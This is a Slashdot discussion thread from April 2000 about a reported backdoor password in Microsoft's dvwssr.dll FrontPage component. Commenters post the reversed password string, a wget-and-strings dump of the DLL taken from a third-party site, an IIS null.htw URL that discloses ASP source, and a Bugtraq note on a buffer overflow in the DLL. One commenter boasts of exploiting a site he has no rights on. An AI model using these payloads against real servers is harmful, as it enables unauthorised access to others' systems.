Backdoor In Microsoft Web Software?

There's a backdoor in Microsoft Webserver software. The Wall Street Journal article isn't very technical, so we don't know yet exactly which software is affected: IIS, FrontPage, or both. It apparently doesn't affect Windows 2000 or FrontPage 2000. The workaround Microsoft "urges" is to delete dvwssr.dll. And just to make your Friday a little more surreal, the secret backdoor password apparently has something to do with Netscape engineers being "weenies." Update: 04/14 09:02 by J : It's been a busy day for some programmers at Microsoft and elsewhere. The word as of 3:30 EDT, according to Russ Cooper, is that "there is NO VULNERABILITY IN DVWSSR.DLL. Yup, that's right, different again from what I said earlier, and even more different than what I said yesterday to WSJ." (more)

Here are the basic details from the article (expensive reg. req.), because I can't find this story anywhere else. Strange that the WSJ should have the scoop on a security issue.

Microsoft Acknowledges Its Engineers Placed Security Flaw in Some Software
By TED BRIDIS
Staff Reporter of THE WALL STREET JOURNAL

Microsoft Corp. acknowledged Thursday that its engineers included in some of its Internet software a secret password -- a phrase deriding their rivals at Netscape as "weenies" -- that could be used to gain illicit access to hundreds of thousands of Internet sites world-wide. [...]

The company planned to warn customers as soon as possible with an e-mail bulletin and an advisory published on its corporate Web site. Microsoft urged customers to delete the computer file-called "dvwssr.dll"-containing the offending code. The file is installed on the company's Internet-server software with Frontpage 98 extensions.

While there are no reports that the alleged security flaw has been exploited, the affected software is believed to be used by many Web sites. By using the so-called back door, a hacker may be able to gain access to key Web-site management files [...]

Russ Cooper, who runs the popular NT Bugtraq discussion forum on the Internet, estimated that the problem threatened "almost every Web-hosting provider." [...]

And, Black Parrot passed along this link to a CBS Marketwatch story, which is free but short on detail.

Re:Actual report - not as bad as it looked

Hrmmm... Russ Cooper barely acknowledges the true source of this.

Much better to go have a look at RFP's post to BugTraq.

One other comment is that M$ products frequently have reports of security holes at least as serious as this, and sometimes a lot more so. I guess this just gets the attention because it was engineered in. But, it is certainly not the only backdoor found in software. Here is a nice one here.

Parting thought, is anyone going to read this?

Re:haha..

.. more crap ..

The crap you omitted was "XWebScope Source Retriever". Maybe it is a string which a client needs to send to microsoft's server to be able to retrieve files? Maybe in combination with the Netscape-weenies string?

I have a feeling that the entire dll is just a tiny "webserver plugin".

The system functions the dll uses are stuff like strcmp, ReadFile, CloseHandle, strlen and so on. Just enough to check for the secret passphrase and send some files. :-)

Re:So what does the file do then?

[Gleef]

According to one source I read, the only use of the file is for ASP support for Visual Interdev version 1.0. Deleting the file will break Visual Interdev 1.0 support, not in and of itself a big deal, most people have either run away from Microsoft authoring tools, or upgraded to a recent version of FrontPage.

On the other hand, knowing Microsoft I wouldn't be surprised if the manner in which Visual Interdev support is broken is by the server crashing when a Visual Interdev 1.0 client makes a request for ASP info. This would replace the security hole with a denial of service attack.

----

Re:Don't any of us check these things?

[Alex+Belits]

Don't blame me -- I don't even touch their software, leave alone run it.

I'm astonished at how big of a deal this seems

[Chris+Johnson]

It forces me to look at my assumptions, and this casts some light on the matter. Anyone who has read my essays section at airwindows.com knows I've acutely distrusted Microsoft for _years_, and in fact written things that at the time could have seemed paranoid until Microsoft went and made all of it a reality.

This is why I am NOT SURPRISED that Microsoft would put in a really _dumb_ and arrogant backdoor key to their software and maintain it through ALL LEVELS of code checking, on purpose- presumably not because they were really actively planning to be able to break into their own customers' computers anytime they wanted, but 'just in case' they might want or need to do that sometime! I fail to see any other possible reason for this. Conceding that they are not the Illuminati or competing with the NSA- the only possible conclusion is that right to the highest levels, Microsoft wanted to leave their options open about someday _becoming_ like that, and so hubris leads them to stick really _stupid_ backdoors in, correctly assuming that their customers would not figure even this out (it's been how many years to figure this one out?)

The thing is, I am not surprised, so I am startled and astonished when this is suddenly getting so much attention. To me it's just another Bugtraq 'issue' because I already _thought_ Microsoft wanted to supplant the government and lay the groundwork for surveilllance and remote control of its own customers. It's old news to me- though this feeling of mine was based on intuition, as I'll happily admit, so there was no real evidence, as I would also admit.

Now there is- it's a 'smoking gun' type of revelation- and while for me it's an 'Ah, I thought so', for many people it's like waking up and realising their mother is not their mother, like she is a bloodsucking Arcturan weasel in a cheap mask. I can sympathise with their shock to some extent even though I never had much patience with their pathetic trustingness in the first place. Sorry guys. New rules.

Re:If it were open source ...

[phil+reed]

This isn't a flaw - it's deliberate. It's no more a flaw than the flight simulator in Excel 97.


...phil

Re:What took so long?

[phil+reed]

Hell yes, it's intentional. How does a text string that says "Netscape engineers are weenies!" wind up in a system DLL and make it through quality assurance checks without being intentional?


...phil

Re:Backdoors in "secure software"

[davew]

If you want to create a second way in, man, go ahead. Write a CGI script to exec sshd or something. But you don't need the maintainers of Apache to do that for you; you don't need that capability hidden from you; and you sure as hell don't need that capability being discovered in someone else's system on the other side of the globe and then exploited in yours while you are taking your first holiday in 2 years...

Backdoors, done properly, have their place. That place is not implemented unknowingly in thousands and thousands of installations worldwide where such a backdoor would be wholly unsuitable anyway.

Make no mistake. Whatever this is, it's not a feature.

Dave
(Still using mozilla 2000041316)

--

"affects almost every web-hosting provider"

[Suydam]

I'm not trying to downplay the significance of this. But the arrogant statement by whoever (in the Wall St. Journal article) had the gall to imply that this would affect "every web-hosting provider" has forgotten that MOST web-hosting providers aren't dumb enough to use IIS in the first place. Just check the Netcraft Survey of websites to see that Apache whose developers probably don't think of Netscape engineers as "weenies", holds a 60% (+/- 5% I'm guessing) market share in that area.

Re:Heaven's Gift? -- Nope

[dougman]

you're assuming "corporate" software goes through a lot of QA, or for that matter adequate QA. As someone who has spent years of his life DEEP in the trenches in a software QA role at a "very corporate" software concern, let me assure you that often, the all-important bottom line trumps the QA process. Often.

Re:Heaven's Gift?

[sjames]

I run Linux at home, several co workers do, the head of ops runs it. I have personally seen linux boxes cracked in 3 seconds. Net BSD seems quite possible though.

Any box that isn't set up properly can be cracked in 3 seconds. Unfortunatly, many distros are not set up correctly. NetBSD is a good choice though.

Re:Backdoors in "secure software"

[sjames]

If, for some reason, the ssh daemon dies, I'm fucked.

If at all possable, I would set the web server up with a serial console to a second system on the site. The second system should also have a relay to trigger the reset line on the server. Nearly all problems that don't require a hardware ficx can then be handled remotely.

There's also the Weasel card that was a story here a while back.

As far as a backdoor goes, A private one that you put there yourself may be a good thing, but a global one that many people know how to access, the odds that you'll have to take a trip to the server increase rather than decrease.

Re:Heaven's Gift?

[sjames]

Which one is going to be cheaper in the long run?

I'd say that Linux/*BSD with Apache is cheaper in the long run. Once set up, Apache is not at all difficult or time intensive to maintain. The same is true of Linux and *BSD. In the real world, I have found that with the same hardware, a Linux system will handle at least 1.5 times the load of an NT system. I don't have much experiance with *BSD, but I understand that it will similarly outperform NT.

The real issue is Frontpage. It is possable to set up Apache with Frontpage, but you are then open to any security flaws it may introduce in it's binary only parts.

As for justifying the money spent on MS licensing: To put it plainly, I cannot think of a justification for that unless some of your customers insist on an NT based server or on features unique to the MS 'solution'.

No, Apache _not_ affected.

[Matts]

The source code for the MS FrontPage extensions for apache is here:

http://www.darkorb.net/pub/frontpage/

See for yourself.

Re:Heaven's Gift? -- Nope

[Hrunting]

you're assuming "corporate" software goes through a lot of QA, or for that matter adequate QA.

I am not assuming this. I specifically stated that people assume this. I have a very good idea how QA general software goes through, but the mass market does not (since they still believe that the product they get is the final, highest quality version). You can mouth off all you want about how much you know, but the fact that Microsoft sells so much product and that everyone uses it tells people in general that they make a good product that everyone can use, thus when they have a screwup, it raises doubts on all of software in general

Re:What took so long?

[bill_mcgonigle]

So if this isn't present in Windows 2000/IIS2000, or whatever it's called this week, then they went over the old code, found it, deleted it, and told nobody.
Unless they're claiming they wrote IIS from scratch now too.

Re:So what does the file do then?

[PhilHibbs]

Are .dll's checksummed? If not, you could just overwrite the "Netscape" message with some gibberish of your own.

Anyone wanna try strings on FrontPage 2000?

[jsm]

This happened in FrontPage 98. Maybe there are some plaintext backdoors in FrontPage 2000. Does anyone with that product wanna run "strings" on a few of the .dll's?

5.01 128 bit english - doesn't work

[Barbarian]

no text

--

Associated Press (AP) article on this

[Barbarian]

Here's an associated press article on this:

http:// wire.ap.org/APnews/main.html?FRONTID=TECHNOLOGY&ST ORYID=APIS73RF7J80

Sorry to weasel into a reply to the first comment here...


--

WSJ: Microsoft Acknowledges Security Flaw

[Col.+Klink+(retired)]

My site subsribes to newscast today (today.newscast.com), which is a fee-based news service that collects articles from several sources and gives you a common interface. I searched for "dvwssr.dll" and found only 3 stories, all from the WSJ. The one quoted above, and two copies of another article from April 14, "Microsoft Acknowledges Security Flaw". A couple of fair-use quotes:

Microsoft Corp. acknowledged yesterday that its engineers included in some of its Internet software a secret password ... that could be used to gain illicit access to hundreds of thousands of Internet sites world-wide.

The manager of Microsoft's security-response center, Steve Lipner ... described such a backdoor password as "absolutely against our policy" and a firing offense for the as yet unidentified employees.

... The company planned to warn customers as soon as possible with an e-mail bulletin and an advisory published on its corporate Web site.

... One of the experts who helped identify the file is a professional security consultant known widely among the Internet underground as "Rain Forest Puppy."

...

Re:Affects "almost every Web-hosting provider."

[clifyt]

Doesn't anyone fricken read...it says about every Web-Hosting Provider. It doesn't say Web-Server. I run a small ISP and I got a few LinuxBoxes and 1 NT Box. The NT shit is a necessity due to corps requiring it. Who am I to complain about this? I make them sign a waver incase something like this comes around that says I'm not responsible at all for M$s problems and more secure webservers are available for cheaper hosting within my company (I charge 2x for the M$ stuff and also charge for every bit of permissions I have to change and every ODBC I have to set up...ya know stuff any gimpie could do from the terminal on Apache).

Learn to read, and don't think just because you have a box set up in the corner you are the average provider...

clif

Whoops, forgot some

[Guru+Meditation]

Forgot to mention that the above is quoted from TechNet April 2000, Visual InterDev technical notes.

----------
'We have no choice in what we are. Yet what are we,
but the sum of our choices.' --Rob Grant
----------

ironic

[jetson123]

Isn't it ironic that in an attempt at insulting another software company, MS engineers demonstrate how unprofessional they themselves are?

Re:Actual report - not as bad as it looked

[dclydew]

Nope, I just exploited it on a site that I have no rights on...

http://www.wiretrip.net/rfp/p/doc.asp?id=45&ifac e=2

Try it yourself....

See link below -- explanation of the vulnerability

[Zico]

This post (http://slashdot.org/comments.pl?sid=00/04/14/0619 206&cid=540) has the information on the vulnerability for those curious to know what the deal is. I shoulda posted it as a reply here to begin with, but am posting this link to it because there probably aren't too many people who will make it down to the 540th post where it got buried. Sorry!

Cheers,
ZicoKnows@hotmail.com

Re:Looks like there never was a backdoor (read bel

[BeBoxer]

I don't think it was the Slashdotter's who made fools of themselves. Keep in mind that this story was carried on numerous major news sites, including WSJ and C|Net, and included the phrase "Microsoft confirmed" along with other quotes from Microsoft management. I really don't think you can blame people for believing the story when it appears that Microsoft itself believed it to be true. Take this quote from the C|Net article about the bug:

"This is a vulnerability because it allows an author on one Web site on a shared server to see anything on another server," said Steve Lipner, manager of Microsoft's Security Response Center. "That's the extent of the vulnerability."

Skepticism is always a healthy thing, but I don't think it's unreasonable to believe that a security hole exists in a Microsoft product when Microsoft says that there is a hole! I mean, do we all have to go install IIS and verify the existence of the hole ourselves to avoid acting "foolish"?

Re:Backdoors in "secure software" as MARKETING

[orpheus]

"Backdoors aren't always a bad thing. Hypothetical situation...

Say due to some "bug" in the software, you get locked out of your mission critical system...

Yup, and if your users don't upgrade as quickly as your marketing plan demands (They lose an entire cycle of revenue and a chink of marketing numbers if you skip from v.1 to v.3)...

and in a couple of year the backdoor might be leaked^h^h^h^h^h^h^h discovered, and many users of your existing products will upgrade. After all, it is the fastest and simplest way to quick-fix this problem (and others that may come later)

Pretty soon, you'll have them trained: BUY THE NEW VERSION ON RELEASE. True, they may not want to install it yet (until the 'gamma testing' is over -- v2.1 or 2.2), but at least they'll have it on hand when v1.x goes up in smoke.

In this case, InterDev 1.0 *requires* the affected DLL (so the MS official fix won't work for InterDev users) and a lot of people will move to Frontpage 2000, when FP 98 (or 97) met their needs quite well until now.

If a licit and deliberate 'front door' password and verification scheme were compromised, MS would clearly be legally liable for failing to protect the password (just as you are liable if you let your corporate password get into the wrong hands) -- but if a "back door" is discovered, then they can blame it on 'evil hackers', even if their own service engineers use it routinely.

BTW, a legal front door would demand that they do more work -- e.g. verify EngineerID by modem to MS HQ or time-varying encryption -- while a back door can be a simple password, since it is never acknowledged. Any company that deliberately uses a password backdoor is guilty of negligence in today's corporate/legal environment. Do they think no service engineer will ever quit or be fired?.

__________

It's in more than one dll

[stx23]

The string also appears in the DLL Mtd2lv.dll, which is installed in C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\. I think is installed by Visual Studio Enterprise Edition, but this DLL is a lot bigger, namely 514Kb over 7Kb.
Does anyone know how to exploit it yet, though?

WTF???

[Shoeboy]

Why didn't they go over to the excel team and learn how to do easter eggs right. Replacing the 404 page with "Netscape blows goats!" would have been cool. This is moronic.
--Shoeboy

Re:Now that's professional...

[Bryan+Andersen]

All code should have code reviews. Where were their code reviews? Who missed this? Did somebody let it go buy?

I'm not surprised so many IIS sites have been hacked. I'm wondering what other gems are in their web server.

Before you think that this problem dosen't effect you, consider the web sites you frequent and buy from.

Re:Down right criminal...

[Bryan+Andersen]

Some fast and lose numbers...

Data from the Netcraft Web Server Survey. Of a total of 13,106,190 servers surveyed about 21% are Microsoft based, or 2,742,931 servers (actual March count). Figuring an average of 2 minutes to login and delete each file at an average pay+overhead rate of $50 an hour for the web admins deleting the .dll you get a cost of about $4,571,552 just to delete the files.

Down right criminal...

[Bryan+Andersen]

The more I think about this the more I feel it is down right criminal to stick a backdoor like this into code. This can lead to massive problems for both individuals and businesses that have data stollen. Look at the trouble that was caused to the credit card companies with the stollen credit card number lists from web servers. Add on top of that the fraudlent charges to peoples credit cards. Deliberate backdoors like this and others make it all that much easier for a cracker or script kiddy to break into a system. Who knows if this was the exploit used in any of the previous security breaches. I'd bet that some used it. maby not all, but some.

Ponder this: Would you accept a security system for your house if you knew it could be bypassed by anybody with a standard code?

Re:Down right criminal...

[coolgeek]

about 21% are Microsoft based, or 2,742,931 servers - that's the good news.

Another interesting info point: with such small marketshare, IIS consistently accounts for 50-70% of reported defacements on attrition.org OS Statistics

Re:Down right criminal...

[fsck]

Or people who run WWW sites could PULL THIER HEADS OUT OF THIER ASS and stop using Microsoft Shitware as a server, when there are proven secure solutions that cost 100% less, such as OpenBSD.

I see stories like this, the NSA scandal, and reading bugtraq, and I just shake my head as to why these people use MS products and smile, feeling all warm and gooshy inside, when they pay enormous amounts of money for something that is proven not to work and is insecure. WTF is going on?

And here's the rest

[Straker+Skunk]

For anyone too lazy to even bother . . .

skunk:~$
skunk:~$
skunk:~$ wget http://www.sivertsen.com/_vti_bin/_vti_aut/dvwssr. dll
--12:06:28-- http://www.sivertsen.com:80/_vti_bin/_vti_aut/dvws sr.dll
=> `dvwssr.dll'
Connecting to www.sivertsen.com:80... connected!
HTTP request sent, fetching headers... done.
Length: 6,416 [text/html]

0K -> ...... [100%]

12:06:28 (59.11 KB/s) - `dvwssr.dll' saved [6416/6416]

skunk:~$ file dvwssr.dll
dvwssr.dll: MS Windows PE 32-bit Intel 80386 GUI DLL
skunk:~$ strings dvwssr.dll
!This program cannot be run in DOS mode.
.text
`.rdata
@.data
.idata
.rsrc
@.reloc
>%u:
D$4h
D$4j
]_^[
t*;5
D$4j
D$<"
DVWSSR.DLL
DllMain
GetExtensionVersion
HttpExtensionProc
/global.asa
.asp
!seineew era sreenigne epacsteN
HTTP/1.0 404 Object Not Found
XWebScope Source Retriever
_refresh_acls_
Content-type: text/html
KERNEL32.dll
lstrcmpiA
lstrcpynA
CloseHandle
ReadFile
CreateFileA
lstrlenA
lstrcpyA
GetModuleFileNameA
lstrcmpA
1!1-141H1O1
2q2}2
`0d0
dvwssr.dbg
ssr.dll
skunk:~$

Re:Taking a bomb on a plane

[Pope]

Does Laurie Anderson know you're stealing her material? :)

Pope

Re:What took so long?

[alfredo]

After seeing my stock portfolio crash and burn I feel trollish too.

there is a difference. MS portrays itself as professsional, and Linux is seen as a grand experiment. No one expects Linux not to have some rough edges. Being a work in progress is what Linux is all about. But when you pay several hundred dollars for software, it better work. If a Disc from some guy making Linux copies is a flaky, no big thing, but if some MS bug factory software turns your computer into a paper weight, it is a big thing.

It is expectations.

Backdoors go *way* back.

[AJWM]

Anyone remember Firesign Theatre's "I Think We're All Bozos on this Bus"? Remember the backdoor Clem used - "Springhead, this is worker".

Heck, I used that same sentence as the backdoor into a system I wrote -- but the customers got source and new it was there. (Further and more, you had to be already logged in at a certain privilege level before it'd be recognized.)

There are some occasions where a system needs to provide some way for a "maintenance worker" (or sysadmin) to expose certain inner workings to manipulation -- that's what the root password is all about, right?

Mind, in this case it doesn't apply: you don't keep such a hook secret from the customer, you do give them the option of changing it (with suitable warnings), and Front Page is hardly anything mission critical enough as to require that sort of access to a running system. (Plenty of other ways to access it if so.)

Running 'strings' on that DLL (buried deep within the FrontPage directories) did indeed turn up "!seineew era sreenigne epacsteN". I've found other interesting strings in MS software (eg, a copyright notice from the Regents at UCB in 'ftp.exe'). Might be interesting to run strings on all the W2K stuff, although perhaps they're more careful now about hiding such things (may they rot13'd it.)

Re:Ye gods.

[Black+Parrot]

> OTOH, people here have run strings on the file and it has turned up the phrase... so...?

Best case it's just a tease and not really a password at all.

But with MS's recent PR track record, who is going to believe there's not a backdoor even if there isn't? The "NSA key" has been in the news again lately. There's a long flamewar going on in the newsgroups right now.

This could hardly come at a worse time for Microsoft.

--

Re:Heaven's Gift? -- Nope

[SuperKendall]

You'd think that corperations, seeing the projects within thier very own company go through little QA and end up fairly buggy, would run away from anything produced by another corperation.

But no, time and time again they seek to buy something just because it's produced by another company with a facade of competency (and it's not just Microsoft we are talking about here).

Re:Related: A Bug in IIS exposes ASP Source-Code!

[SuperKendall]

There was a space in the URL given - the end should read CiHiliteType=Fill.

I'll try pasting in the fixed URL:
http://www.yoursite.com/null.htw?CiWebHitsFile=/yo urfile.asp%20&CiRestriction=none&CiHilit eType=Full

Nope, /. html munging code strikes again. Oh well, you can fix it by hand.

Spelling....

[SuperKendall]

Sorry, make that:

There was a space in the URL given - the end should read CiHiliteType=Full

Not "Fill"!!!

Yeah, but...

[HarryCaul]

Ok, sure there's a backdoor in this dll, but what can you do with it? Is it something that can only be accessed from the console? From a webpage somehow? and what rights does the backdoor give you? As funny as I think this is (come on, the fix is "delete the file"?), it remains to be seen just how dangerous the hole really is.

Most persuasive argument for open source

[stab]

No matter what license code comes under, as long as all of the source code is available (even if it's look but don't touch), problems like this will be prevented by simple code auditing and peer review.

And that's why I'd never trust a piece of Microsoft server software over Apache or Qmail for example. A lot of Microsoft software is relatively stable now (my win2k install hasnt needed rebooting in a month), but so closed and opaque that there's no way whatsoever to audit or confirm that a million backdoors aren't present. One has been found, how many others?!

Interesting - I wonder if there's more.

[Frac]

Anyone care to run checks on more of Microsoft's DLLs? I'm inclined to think that this isn't the only cleartext backdoor in Windows.

No wonder MS doesn't want DOJ to open-source Windows. It would take them years to clear out all the inside-jokes, bad hacks, broken code, and cleartext backdoors. Yeesh.

My thoughts on what I've seen...

[PigleT]

So `strings d*.dll` produces something you'd find in a dictionary, therefore there's a secret backdoor and all IIS servers are unsafe and if M$loth put the wrong content up on a webserver they could trigger WW3...

Er. Yeah, right. Next?
~Tim
--
.|` Clouds cross the black moonlight,

You forgot to read the next paragraph

[NeoMage]

The very next part of this reads:

FrontPage does not change ACLs on content files to manage design-time security; it only changes ACLs on the directories that contain the gatekeeper files admin.dll, author.dll, and dvwssr.dll. FrontPage manipulates content file ACLs to manage run-time security, which is the topic of the next section.

This file can only be reached and executed if you have -AUTHOR- rights to the web. If you are a smart admin, you would be hosting your sites on NTFS partitions and therefore this is not the big risk that they say it is.

The 'password' is probably visible in a sniff, or even encoded in the HTTP POST request to the extensions however you CANNOT execute the dll call it without the permissions.

Re:So what does the file do then?

[rcw-work]

Some (VBRUN300.DLL) are, most (SHELL32.DLL, etc) aren't. The checksumming isn't internal to Windows' DLL-loading process, but some DLL's do a checksum of themselves and refuse to run if modified.

In this case, you could probably make as many changes as you wanted. Just don't change the length of the string unless you're really really good at changing offsets and entry points. :)

Re:haha..

[garver]

Wow. Thankfully, I didn't find the same in the Linux Frontpage extensions. I looked in both version 3.0 for Frontpage 98 and version 4.0 for Frontpage 2000.

I can't tell you how much it drives me nuts to have to load Microsoft software on my Linux web servers. So much so that I don't even trust their setuid wrapper. Each site runs as a dummy user, which owns their files.

Re:Linux has frontpage extensions?

[garver]

Or if one has customers that demand frontpage, these aren't hard to find, and doesn't want to run MS IIS to support them.

If you install Frontpage extensions with apache, be very careful with security. Do not allow shell access to the machine and Do not trust MS's mod_frontpage for Apache. There is an alternate mod_frontpage (not the darkorb one) that is based on suexec. I don't have the link here at work, but I can post it from home, if you are interested.

Sure, frontpage is still an insecure piece of crap, but I have it so that it never sees the light of root, in fact each site has its own userid. Therefore, the only thing that can get screwed is my user's pages, one at a time. I'm not responsible for that, and they know the risks.

Re:Red Hat cannot do this

[hey!]

Ever heard of source RPMS?

Sure, and I read every line of code in every SRPM I install, just like you do ;-)

mod_frontpage w/suexec

[/]

IIRC, it's one of the links off here.

But WAIT!!!! A buffer overflow...

[Gompers]

Just in from bugtraq....

From core.lists.bugtraq@CORE-SDI.COM Fri Apr 14 20:23:10 2000
Date: Fri, 14 Apr 2000 20:40:48 -0300
From: Gerardo Richarte
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: DVWSSR.dll Buffer Overflow Vulnerability in Microsoft IIS 4.0 Web
Servers
Russ wrote (in ntbugtraq):
> Ok, here's a breaking update.
>
> Latest reports say that there is
>
> NO VULNERABILITY IN DVWSSR.DLL
>
> Yup, that's right, different again from what I said earlier, and even more
> different than what I said yesterday to WSJ.
That is not correct.
We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least.

-snip-

We've been playing a little more trying to exploit this buffer overflow, and as we don't
have InterDevs installed on our IIS, we copied the .dll to /msadc directory, and with
this configuration, we have been able to make the code jump to our buffer.
Under this circunstances, the actual BO allow to execute arbitrary code in the target machine.
It's interesting to note that no log is generated as efect of this attack.

-snip-

ok folks..this is almost comical...

Re:How is a string backwards a backdoor?

[Gompers]

Apparently Microsoft finds it serious enough to recommend deleting a dll and removing functionality from their product...if it WASN'T a backdoor, do you think they'd do that? After all, they can see the source code and are the only ones that know for sure how their stuff works...or maybe they are just doing it to bely fears...who knows?

Secure CVS

[coyote-san]

we had tight configuration management, in a package a wee-bit more secure than CVS...

CVS can be made reasonably secure with one simple change: require Kerberos authentication. This has several beneficial effects:

• CVS *knows* who the user is - there's no worries about old .cvspassword files lying around or being cracked.
• The user *knows* who the CVS server is - there's no risk of man-in-the-middle attacks.
• You can encrypt client/server traffic - nobody can modify the data stream en route.

The CVS server should also be secured, of course, but the combination of the standard Unix permissions and Kerberos telnet and ftp should be adequate to provide a fairly high level of confidence that nobody has modified the underlying RCS files directly.

Re:FP98 extensions for UNIX affected?

[ebcdic]

Assuming the link posted in another message is genuine, the string you need to look for is !seineew era sreenigne epacsteN

Re:Taking a bomb on a plane

[MadAhab]

I dig a really big hole in my garden, maybe the neighbours won't notice that there are lots of little holes all around it?

Well, this is a technique for getting past censorship. An East German cabaret director told me they called this Weisse Hund, or white dog. They would deliberately put in jokes they knew the censors would reject. Having done his job, the censor would go home, forgetting about the dozen slightly more subtle jokes.

So the question is, who is looking over their shoulders and why are they trying to preserve backdoors?

Re:WSJ: Full Text Now Free

[Cy+Guy]

Get it from ZDNet.

Re:Oh dear....

[nodeboy]

well they new about it for ages, but only tell us now, why? To give a reason to UPGRADE!! everyone upgrade, upgrade, upgrade!!!

the bug is missing from win2000, but wait, when win2002 comes out then suddenly a hole will appear and then everyone will have to UPGRADE AGAIN!!!

Just don't forget to upgrade chaps!

PS. I hope this "feature" will leave them open to a class action ;-)

Re:As for the password......

[radja]

pfft.. they probably were cleverer than calling people weenies.. but MS forced them to change it into somethiung non-offensive...

//rdj

Re:Not MS policy

[Our+Man+In+Redmond]

For what it's worth, KIRO Radio (Seattle's news/talk station and CBS affiliate) reported this morning that a Microsoft spokesman -- I don't remember which one -- said that this was (paraphrasing) "a very serious breach of company policy" and "those who did it could be fired." Could be? I'll bet they're publicly hung, shot, drawn and quartered, burned at the stake, and bludgeoned to death. And then the real disciplinary action is going to start.
--

So we have the password

[BorgDrone]

but how to use it ??

I'd love to know where to use the pwd, I'll bet lots of lame wannabe sysops 'forget' to delete the file.

---

Re: Heres an artical from ZDNET

[jhittner]

heres a new arti cle from ZDNET with some aditional details.

Backdoors in "secure software"

[Godfree^]

Backdoors aren't always a bad thing. Hypothetical situation...

Say due to some "bug" in the software, you get locked out of your mission critical system. How do you get back in? You phone tech. support and ask for help. 2 possible outcomes: Format and complete reinstall (you only last the last x hours/days/weeks work), or they send out an engineer with knowledge of a backdoor and allow you access to your system again. Personally, I'd prefer the latter of the 2 options, it's a helluva that more cost effective in the long term, and helps support of the software.

THe one downfall to this is that people MAY (not nessecarilly will) discover the backdoor and exploit it, however, if the backdoor is there, chances are there is a way to disable it (as in this case, deleting a dll file). Maybe MS did a good thing here, maybe not. WHo's to say?

Re:Backdoors in "secure software"

[Godfree^]

THe most famous company for having a backdoor is possibly Novell... have you ever heard of burglar.nlm?

It was developed for use by Novell support engineers to reset the supervisor password in Netware in the event that it was somehow lost (be it a crash in the server, a hack, or forgetfullness). All they needed to do was get to the server console, install the NLM and wehay! No supervisor password.

However, the NLM got out, and due to bugs in Netware ppl could install the NLM remotely, hack into rconsole and voila! A nice new 0wn3d network...

After a while, Novell (Apparently) started terminating support contracts on any system that had burglar on it.

Re:Backdoors in "secure software"

[Duxup]

Although I think it's hard to say if this is indeed a case of the flaw being a back door by design.

I know of few commercial companies that do not have something of a backdoor (to one extreme or another) designed in their software, or a flaw they find that they do not fix intentionally.

When working on my own personal systems I hate the idea of such a "backdoor" existing. However, to be honest in the past I have exploited such tricks on other people systems (or avoided fixing some "backdoors" in other peoples systems) to save them time in the future, and it's worked.

It's one of those things I hate to know is out there, but I have to admit I've used it to my benefit.

Re:Backdoors in "secure software"

[Duxup]

I had not heard of that one.

It would seem that such backdoors (security flaw, or intentional) were much more common in the past, or at the least more openly spoken of. I've worked with some old IBM, and a few other companies, network and software engineers from "way back in the day" and it seemed as if when they worked on new networks and software in the past that it was almost expected that there would be a backdoor of one sort or another (usually a bug later discovered). Most of them explained that it was used then because the companies who would contract them out, would then hire clueless engineers to run them (sadly seems like today still) who would not know how to manage the systems mainly because they were proprietary and often customized for each company. So eventually they'd probably need to manipulate a bug or designed backdoor to repair damage done to the system by some fool.
Fortunately, unlike today, that wasn't entirely insecure because most likely only a few companies had the same backdoor and very few people were aware of the bugs or backdoors. Now with nearly everyone using the same software a backdoor seems much more dangerous.

Re:Backdoors in "secure software"

[yuggoth]

Then pray to the gods that the tech support engineer isn't married to an employee of your competitor (or doens't have a friend who knows somebody who works there etc...:-)

If you want a backdoor, why don't you ask for it right when the system is installed so you can do it yourself? Do you assume the software company installs backdoors only for the good of its customers?

If you get locked out of you mission critical system - well, you should have made complete backups on a regular basis, so you can reinstall it in a couple of hours. If you didn't, your business won't get far anyway ...

If it's really important not to lose a single second of work, mirror your system on different machines using different passwords. If you just can't keep your passwords in memory, place them in a bank safe or somewhere else where they can't fall in the wrong hands.

Re:Backdoors in "secure software"

[Fishstick]

You know, I've always wondered the same thing. That makes sense, but why do they leave the "cheat-code" logic in the game and why do the codes always get discovered and made public?

Re:Backdoors in "secure software"

[remande]

Often, a "service entrance" is needed, a way to access your software when you lose your primary access credentials (like, say, you forget the root password). The term "back door" implies a service entrance accessed by knowing a secret that is common across all machines. If we run the same type of system, we have the same back door. This spells doom for truly secure systems, since such secrets get leaked often.

Secrets get leaked at a rate proportional to both the number of people who know it and the value of the secret. In the MS case, the secret is potentially known by several thousand MS employees with source code access, and the value of the secret is incredible, since it allows access to thousands if not millions of Web servers. In contrast, passwords rarely leak because they are known by only one person and can only be used to attack one site.

To handle the case of getting locked out of your own system, you use a well-documented, well-protected service entrance. A perfect example is the OS itself, be it NT, Unix, or whatever.

If you lock yourself out of your OS (lost the root password or something), the service entrance is to boot from CD or floppy, which gives you superuser priveleges and allows you to change the superuser password(s). The security of the service entrance is due to teh fact that said devices are physically connected to the machine. That is, you need physical control of the machine, the ability to touch the case, before you can exploit this. And if such a machine needs to be secure, the competent admin will put it under lock and key. We can't protect you against incompetent admins.

If the system you are locked out of is an application rather than an OS, you can build a service entrance that requires superuser priveleges. Since you can always gain superuser priveleges with physical access (see above), no back door is needed.

Re:Backdoors in "secure software"

[davew]

Say due to some "bug" in the software, you get locked out of your mission critical system. How do you get back in?

You send a tech to let you back in through a well known and documented procedure that allows full access from the console, a feature you knew about and chose not to disable.

The fact that backdoors can be useful does not excuse one being placed silently in a piece of software that is then marketed as secure. You may approve of having a remote back door; you may believe that the risk is sufficiently small to justify the potential cost savings. That's great. But that is a decision for each customer to make, and not every customer will agree.

Separately, it's my opinion that a common remote backdoor, no matter how well hidden, will turn round and bite you on the arse eventually. This software is too well deployed; too many people are auditing it and probing it. If an engineer puts 100 hours of work into hiding it, it only takes 100 people 1 hour of searching to equal that effort. How before someone makes that discovery? And how long after that before it is widely reported anywhere other than IRC?

Dave
(posted with Mozilla 2000041316)

--

Re:Backdoors in "secure software"

[jamused]

If you can get locked out of a mission critical system, and yet there is a way to fix the system, that way should be made available through a "front door" with proper, user configurable, security. There is no problem for which a secret way into your mission critical system is the proper solution.

For those who are keeping count...

[Twid]

Microsoft abuses:
- secret backdoors (this bug)
- scour your hard drive secretly for information (Win95 registration wizard)
- break competitor's products (Windows Media Player and Real)
- fabricate evidence in a federal trial (Windows demonstration for Judge Jackson)
- convicted by a Federal judge of being a harmful monopoly
- under investigation in Europe
- over 100 civil lawsuits pending against them.

And that's just off the top of my head. Why would anyone with sensitive data (banks, government, etc...) trust them?

-Twid

Funny as heck, I want to be a weenie!

[Duxup]

